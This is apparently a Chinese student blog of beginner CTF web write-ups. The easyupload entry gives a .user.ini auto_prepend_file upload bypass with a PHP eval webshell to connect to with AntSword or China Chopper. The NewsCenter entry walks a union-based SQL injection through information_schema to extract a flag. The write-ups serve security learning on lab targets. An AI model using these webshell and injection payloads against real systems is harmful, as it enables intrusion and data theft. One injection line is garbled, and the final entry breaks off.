攻防世界 command_execution
这是暑期第二篇blog,刚开始做这道题有点犯傻,以为和ping命令有关,还去学了一下ping相关的知识,也没发现应该怎么办。又仔细审了一下题发现这是建立在题目主机上的ping命令,以及题目名为命令执行,也就是说通过ping来执行系统命令。
easyupload
攻防世界 web新手 easyupload(其实一点儿也不easy)
简要介绍:两个 选项:选择文件与上传
大概率是文件上传漏洞
于是开始试他的过滤限制:
经过不停的上传与不停的失败,试出来大概几个限制:
1.文件内不能有php字符
2.后缀不能有 .php
3.文件类型
这个到这里,我现有的知识已经不够了,于是上网搜索,搜到了这个(.user.ini)
接下来,课外小常识:.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。
看php.ini中的配置项,沮丧地发现,只要稍微敏感的配置项,都是PHP_INI_SYSTEM模式的(甚至是php.ini only的),包括disable_functions、extension_dir、enable_dl等。 不过,我们可以很容易地借助.user.ini文件来构造一个“后门”。
Php配置项中有两个比较有意思的项:
1.auto_append_file
2.auto_prepend_file
auto_prepend_file是指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。
so,下面是步骤(前几步都成功了最后一步莫名翻车 இ௰இ)
1.构建.user.ini文件
GIF89a(绕过文件类型限制)
auto_prepend_file=a.jpg
2.传入有马的图
GIF89a
<?=eval($_POST【‘c’】);?>(用的中文符号,怕出事)
(均抓包上传,记得修改content_type)
3.用菜刀,蚁剑连接,就可以。
(/(ㄒoㄒ)/~~,菜刀连接其他的打不开,蚁剑连不上,翻车了)
NewsCenter
攻防世界 web新手 NewsCenter
进入题目环境,只有一个搜索框,与一个回显框(极度简化我的描述),猜测是sql,于是挑了一个关键词Hello,开始尝试。
1.首先构造了一个语句检测是否有注入点:Hello’ or 1=1#
结果:所用新闻回显,证明存在注入点
2.那就正式开始注入:
(1) 检测列数:Hello’ order by 3 #(ps:那个3,是通过1,2,3一点点得到的,改成4,就出错了,不知道有没有更好的办法)
(2) 检测回显位置:Hello’union select 1,2,3 #(ps:根据3列构造的语句)结果显示竖着排列的2 3,证明在2 3位置回显
(ps:其实这道题做的时候,对着书跟着做的,结果忘记检测列数与回显位置了,然后构造的语句只有一列,疯狂出错,人都傻了(━┳━ ━┳━))
(3) 注入表名:Hello’ union select 1,union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #
得到结果为 news,secret_table
3
(ps:1.information_schema是默认数据库,储存着所有数据库名、表名。
2.group_concat是用“,”连接结果并显示在一个字段的函数。
3.database()返回当前数据库的名称)
(4) 猜测flag在secret_table中,
注入字段名:Hello’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’secret_table’ #
得到结果 id,fl4g
3
(5) 查看内容:union select 1,fl4g,3 from secret_table #
得到结果 QCTF{sq1_inJec7ion_ezzz}
(ps:图床出问题了(/(ㄒoㄒ)/~~))
baby_web
攻防世界 web新手 baby_web
题目描述:想想初始页面是哪个
提示:应该是index.php
解答过程:
1.尝试访问index.php,但都会跳转到1.php
(到这里其实已经不知道为什么了,上网搜的(/(ㄒoㄒ)/~~)
2.抓包,跳转到1.index后,进入repeter模块,将1.php修改为index.php
3.在hex查看,得到flag
xff_referer
攻防世界 web新手 xff_referer
题目描述:
